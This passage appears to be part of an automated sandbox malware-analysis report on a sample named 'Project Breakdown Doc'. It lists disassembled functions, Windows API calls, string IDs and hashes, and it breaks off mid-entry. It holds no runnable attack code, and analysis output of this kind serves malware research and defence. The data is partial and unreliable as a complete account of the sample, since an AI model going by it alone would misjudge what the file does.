                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: IconLoad
                                                  • String ID: blank$info$question$stop$warning
                                                  • API String ID: 2457776203-404129466
                                                  • Opcode ID: 5e6e160019c0cf241bd30fb61ed79bde7724e1252ad7790178bbcfc33f5b5b36
                                                  • Instruction ID: 993eff35c5ab1480d91242479a9312eedc7da2ae76af30d2dec62a23406ba232
                                                  • Opcode Fuzzy Hash: 5e6e160019c0cf241bd30fb61ed79bde7724e1252ad7790178bbcfc33f5b5b36
                                                  • Instruction Fuzzy Hash: 6A112B313083CBBBA7115B55DCA3EAEB79CDF1B378F20012AF614961C3D6616B4055A5
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00CA454E
                                                  • LoadStringW.USER32(00000000), ref: 00CA4555
                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00CA456B
                                                  • LoadStringW.USER32(00000000), ref: 00CA4572
                                                  • _wprintf.LIBCMT ref: 00CA4598
                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00CA45B6
                                                  Strings
                                                  • %s (%d) : ==> %s: %s %s, xrefs: 00CA4593
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: HandleLoadModuleString$Message_wprintf
                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                  • API String ID: 3648134473-3128320259
                                                  • Opcode ID: 8d67be63a83a22c7ec035aa6c90f43f55af19311e32fb01222aee18afc1e70ae
                                                  • Instruction ID: 7d7ae9a9826768dda4af17838097deb65b89ce21bc471776fa651ccd92a8e575
                                                  • Opcode Fuzzy Hash: 8d67be63a83a22c7ec035aa6c90f43f55af19311e32fb01222aee18afc1e70ae
                                                  • Instruction Fuzzy Hash: 16014FF2900208BFE750A7A0DD89FEA776DD708301F0005A9FB45D2051EA749E868B75
                                                  APIs
                                                    • Part of subcall function 00C42612: GetWindowLongW.USER32(?,000000EB), ref: 00C42623
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00CCD78A
                                                  • GetSystemMetrics.USER32(0000000F), ref: 00CCD7AA
                                                  • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 00CCD9E5
                                                  • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00CCDA03
                                                  • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00CCDA24
                                                  • ShowWindow.USER32(00000003,00000000), ref: 00CCDA43
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00CCDA68
                                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00CCDA8B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                  • String ID:
                                                  • API String ID: 1211466189-0
                                                  • Opcode ID: a61219c99166bfd43349a7e7e0b360233160917a3f4ec04ee94ae45d55c30c38
                                                  • Instruction ID: 7f6824192e864f19fd56cf15f9d8ba25c2d61768446141f5e6a6b46edab3290a
                                                  • Opcode Fuzzy Hash: a61219c99166bfd43349a7e7e0b360233160917a3f4ec04ee94ae45d55c30c38
                                                  • Instruction Fuzzy Hash: 8EB18935600225EBDF14CF69C9C5BBD7BB1BF04701F08807DEC5A9A295DB34AA90DBA0
                                                  APIs
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C7C417,00000004,00000000,00000000,00000000), ref: 00C42ACF
                                                  • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,00C7C417,00000004,00000000,00000000,00000000,000000FF), ref: 00C42B17
                                                  • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,00C7C417,00000004,00000000,00000000,00000000), ref: 00C7C46A
                                                  • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,00C7C417,00000004,00000000,00000000,00000000), ref: 00C7C4D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: ShowWindow
                                                  • String ID:
                                                  • API String ID: 1268545403-0
                                                  • Opcode ID: e8fd581db41b2035064d5d2c2ccf87c4c41bf0f8c34b6ad1dbfa7e3d38271cf6
                                                  • Instruction ID: 9070c6e8bb69361363cfe7d45ffaf2e7aa0d182c6a74da4cc807d53753e704e4
                                                  • Opcode Fuzzy Hash: e8fd581db41b2035064d5d2c2ccf87c4c41bf0f8c34b6ad1dbfa7e3d38271cf6
                                                  • Instruction Fuzzy Hash: 82412A312087809BC7358B29DCDEB7B7BA2FB95300F98C81DF86B86560C6759946F721
                                                  APIs
                                                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00CA737F
                                                    • Part of subcall function 00C60FF6: std::exception::exception.LIBCMT ref: 00C6102C
                                                    • Part of subcall function 00C60FF6: __CxxThrowException@8.LIBCMT ref: 00C61041
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00CA73B6
                                                  • EnterCriticalSection.KERNEL32(?), ref: 00CA73D2
                                                  • _memmove.LIBCMT ref: 00CA7420
                                                  • _memmove.LIBCMT ref: 00CA743D
                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00CA744C
                                                  • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00CA7461
                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00CA7480
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 256516436-0
                                                  • Opcode ID: 7ac7193605053e008ce6d782000fe1b1a912747bc317bdf76005e68cbeebcaf0
                                                  • Instruction ID: fe6e726181b2b39bee63fb07c5895f759a24aafb164a6a9b3f1c466f50f74652
                                                  • Opcode Fuzzy Hash: 7ac7193605053e008ce6d782000fe1b1a912747bc317bdf76005e68cbeebcaf0
                                                  • Instruction Fuzzy Hash: 56317C71904205EBCF10DFA4DC85FAFBBB8FF45710B1841A9F904AB256DB309A15DBA1
                                                  APIs
                                                  • DeleteObject.GDI32(00000000), ref: 00CC645A
                                                  • GetDC.USER32(00000000), ref: 00CC6462
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CC646D
                                                  • ReleaseDC.USER32(00000000,00000000), ref: 00CC6479
                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00CC64B5
                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00CC64C6
                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00CC9299,?,?,000000FF,00000000,?,000000FF,?), ref: 00CC6500
                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00CC6520
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                  • String ID:
                                                  • API String ID: 3864802216-0
                                                  • Opcode ID: 8bc86d3442dfead43dcd43112bafb8207aaab92e3b90bfea8b5509453f67cc79
                                                  • Instruction ID: c902ed91f03741f0d9f88ecd1b432ded5348eee9c9066dae3d9abdcf00613fb5
                                                  • Opcode Fuzzy Hash: 8bc86d3442dfead43dcd43112bafb8207aaab92e3b90bfea8b5509453f67cc79
                                                  • Instruction Fuzzy Hash: BA317F72201214BFEB118F50CD4AFEA3FAAEF09761F044069FE089A291D6759D42CB74
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memcmp
                                                  • String ID:
                                                  • API String ID: 2931989736-0
                                                  • Opcode ID: b41ef96ee1f7ef5bbc26e62610dda712824fc8bc1d3c45c18d1623735aa8b5b4
                                                  • Instruction ID: 263e9d0fbc2241d00117fd33425ba890f40daa245d8fbbea2b283ab1198a848a
                                                  • Opcode Fuzzy Hash: b41ef96ee1f7ef5bbc26e62610dda712824fc8bc1d3c45c18d1623735aa8b5b4
                                                  • Instruction Fuzzy Hash: F0219F75601205BBEA24A521CDCAFAF239DEF60395F0C5021FE0596382E791DF11D2B5
                                                  APIs
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                    • Part of subcall function 00C5FEC6: _wcscpy.LIBCMT ref: 00C5FEE9
                                                  • _wcstok.LIBCMT ref: 00CAEEFF
                                                  • _wcscpy.LIBCMT ref: 00CAEF8E
                                                  • _memset.LIBCMT ref: 00CAEFC1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                  • String ID: X
                                                  • API String ID: 774024439-3081909835
                                                  • Opcode ID: 3eb12f283f4a60550f434db708fb03e184aa7ec7ae3a31cca9b6c72134da8189
                                                  • Instruction ID: 7f2c6018161e6e9fc16c1806076d0eb21b274088609f10a31d3f18c955e3c738
                                                  • Opcode Fuzzy Hash: 3eb12f283f4a60550f434db708fb03e184aa7ec7ae3a31cca9b6c72134da8189
                                                  • Instruction Fuzzy Hash: 75C18D715083019FCB24EF64C885A6EB7E4FF85314F04492DF99A9B2A2DB30ED45DB82
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: da1c66e86c4ecb278b989b3c2bbdcdf349f47f331fbdc6029b86b97ece8f735b
                                                  • Instruction ID: df732fcf27332abfe67a3e7c6214d69008d02e6fcf5ae7de336ca65d2fbf471b
                                                  • Opcode Fuzzy Hash: da1c66e86c4ecb278b989b3c2bbdcdf349f47f331fbdc6029b86b97ece8f735b
                                                  • Instruction Fuzzy Hash: 2A716C30900109EFCB14CF99CC49EBEBBB9FF85310F188159F965AA251C730AA91DBA0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 0548a252a2625a02dc580d264c90558bcfde254f3d347f53eee68a8ea16c09a3
                                                  • Instruction ID: aa94dd3995f2d4ae9aaa2202ffef3d7c51fdc3987078b238e4825480ec043a7d
                                                  • Opcode Fuzzy Hash: 0548a252a2625a02dc580d264c90558bcfde254f3d347f53eee68a8ea16c09a3
                                                  • Instruction Fuzzy Hash: 1461AC71508300ABC720EB24DC86FAFB7E9EF84714F144A1DF956972A2DB709E05D792
                                                  APIs
                                                  • IsWindow.USER32(017A55B0), ref: 00CCB6A5
                                                  • IsWindowEnabled.USER32(017A55B0), ref: 00CCB6B1
                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 00CCB795
                                                  • SendMessageW.USER32(017A55B0,000000B0,?,?), ref: 00CCB7CC
                                                  • IsDlgButtonChecked.USER32(?,?), ref: 00CCB809
                                                  • GetWindowLongW.USER32(017A55B0,000000EC), ref: 00CCB82B
                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 00CCB843
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                  • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                  • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                  • String ID:
                                                  • API String ID: 4072528602-0
                                                  • Opcode ID: 008b5fd4b68384203f94c0f6ef6038b2870e0e2ea817859ac7805cf3a03cd1a6
                                                  • Instruction ID: 585aa504a51a04cf89f16a2c56deff9e5b5c818cc9056293bc17079e6a05a855
                                                  • Opcode Fuzzy Hash: 008b5fd4b68384203f94c0f6ef6038b2870e0e2ea817859ac7805cf3a03cd1a6
                                                  • Instruction Fuzzy Hash: 92718E34600204EFDB259FA4C896FAABBB9FF89300F14406DF965973A1C731AE51DB60
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CBF75C
                                                  • _memset.LIBCMT ref: 00CBF825
                                                  • ShellExecuteExW.SHELL32(?), ref: 00CBF86A
                                                    • Part of subcall function 00C49997: __itow.LIBCMT ref: 00C499C2
                                                    • Part of subcall function 00C49997: __swprintf.LIBCMT ref: 00C49A0C
                                                    • Part of subcall function 00C5FEC6: _wcscpy.LIBCMT ref: 00C5FEE9
                                                  • GetProcessId.KERNEL32(00000000), ref: 00CBF8E1
                                                  • CloseHandle.KERNEL32(00000000), ref: 00CBF910
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                  • String ID: @
                                                  • API String ID: 3522835683-2766056989
                                                  • Opcode ID: c86caff59023e75af4b825f39cdf7bd5d85c38389c0bc513b34745c83ef85dd7
                                                  • Instruction ID: 32a3540f00fc521c250bb0e9b55c16d77cdd2c09b23dedc8ebc6ee372703016d
                                                  • Opcode Fuzzy Hash: c86caff59023e75af4b825f39cdf7bd5d85c38389c0bc513b34745c83ef85dd7
                                                  • Instruction Fuzzy Hash: D1618F75A006199FCF14DF54C881AAEBBF5FF49310F14846DE85AAB391CB31AE42DB90
                                                  APIs
                                                  • GetParent.USER32(?), ref: 00CA149C
                                                  • GetKeyboardState.USER32(?), ref: 00CA14B1
                                                  • SetKeyboardState.USER32(?), ref: 00CA1512
                                                  • PostMessageW.USER32(?,00000101,00000010,?), ref: 00CA1540
                                                  • PostMessageW.USER32(?,00000101,00000011,?), ref: 00CA155F
                                                  • PostMessageW.USER32(?,00000101,00000012,?), ref: 00CA15A5
                                                  • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00CA15C8
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: e6f6aa89aaf56fdbe9203c7501b80e81de456001f5d83cde19f1a3c762505f85
                                                  • Instruction ID: e01a781f8ccc11ded358b0496423d4ff7edffb12ebba124d56288a3e93d3781c
                                                  • Opcode Fuzzy Hash: e6f6aa89aaf56fdbe9203c7501b80e81de456001f5d83cde19f1a3c762505f85
                                                  • Instruction Fuzzy Hash: DC51D3A0A047D73EFB364638CC49BBA7EE95B47308F0C8489F9E5868C2C294DE84D750
                                                  APIs
                                                  • GetParent.USER32(00000000), ref: 00CA12B5
                                                  • GetKeyboardState.USER32(?), ref: 00CA12CA
                                                  • SetKeyboardState.USER32(?), ref: 00CA132B
                                                  • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00CA1357
                                                  • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00CA1374
                                                  • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00CA13B8
                                                  • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00CA13D9
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: MessagePost$KeyboardState$Parent
                                                  • String ID:
                                                  • API String ID: 87235514-0
                                                  • Opcode ID: bd86c00605863efbc7cdda201ba910e50110a9ebf997a2c2d664d9387762ca1f
                                                  • Instruction ID: a73d78d4fde0c02d5bb5ec03f28b59992f78f58e5cb324e892c433a0cf293de9
                                                  • Opcode Fuzzy Hash: bd86c00605863efbc7cdda201ba910e50110a9ebf997a2c2d664d9387762ca1f
                                                  • Instruction Fuzzy Hash: B85104A05057D73DFB328B258C45B7ABFA95B07308F0C8589E9E48A8D2D395EE84E750
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: _wcsncpy$LocalTime
                                                  • String ID:
                                                  • API String ID: 2945705084-0
                                                  • Opcode ID: c99df3ef6a6cb5ce4eaa31fe00654302cdbbb134959a8949def1ff80f58ee5fe
                                                  • Instruction ID: 95dd652c89cfeb0b7b7240c76e1481fa4bc142cfffbdad708e1f3081eb63051f
                                                  • Opcode Fuzzy Hash: c99df3ef6a6cb5ce4eaa31fe00654302cdbbb134959a8949def1ff80f58ee5fe
                                                  • Instruction Fuzzy Hash: 3B419465D205287ACB21EBB4CCC69CFB3A8AF05310F508566F518E3261F734E716D7A5
                                                  APIs
                                                    • Part of subcall function 00CA48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00CA38D3,?), ref: 00CA48C7
                                                    • Part of subcall function 00CA48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00CA38D3,?), ref: 00CA48E0
                                                  • lstrcmpiW.KERNEL32(?,?), ref: 00CA38F3
                                                  • _wcscmp.LIBCMT ref: 00CA390F
                                                  • MoveFileW.KERNEL32(?,?), ref: 00CA3927
                                                  • _wcscat.LIBCMT ref: 00CA396F
                                                  • SHFileOperationW.SHELL32(?), ref: 00CA39DB
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CCF000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685914892.0000000000CF5000.00000002.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685949044.0000000000CFF000.00000004.00000001.01000000.00000003.sdmp
                                                   • Associated: 00000000.00000002.1685999541.0000000000D08000.00000002.00000001.01000000.00000003.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_c40000_Project Breakdown Doc.jbxd
                                                  Similarity
                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                  • String ID: \*.*
                                                  • API String ID: 1377345388-1173974218
                                                  • Opcode ID: 6c32e98e6dfd9242299d16778dd8d933e44cea83f380ee33f0cab77add8aadac
                                                  • Instruction ID: 76d466070f98c8348b4ccabd1532b612cab283f591495d37ac797f1a62aa6da5
                                                  • Opcode Fuzzy Hash: 6c32e98e6dfd9242299d16778dd8d933e44cea83f380ee33f0cab77add8aadac
                                                  • Instruction Fuzzy Hash: 0641B1B15083859EC755EF64C491AEFB7E8AF89344F04092EF499C3191EB74D748C752
                                                  APIs
                                                  • _memset.LIBCMT ref: 00CC7519
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00CC75C0
                                                  • IsMenu.USER32(?), ref: 00CC75D8
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00CC7620
                                                  • DrawMenuBar.USER32 ref: 00CC7633
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1685870391.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                   • Associated: 00000000.00000002.1685856618.0000000000C40000.00000002.00000001.01000000.00000003.sdmp
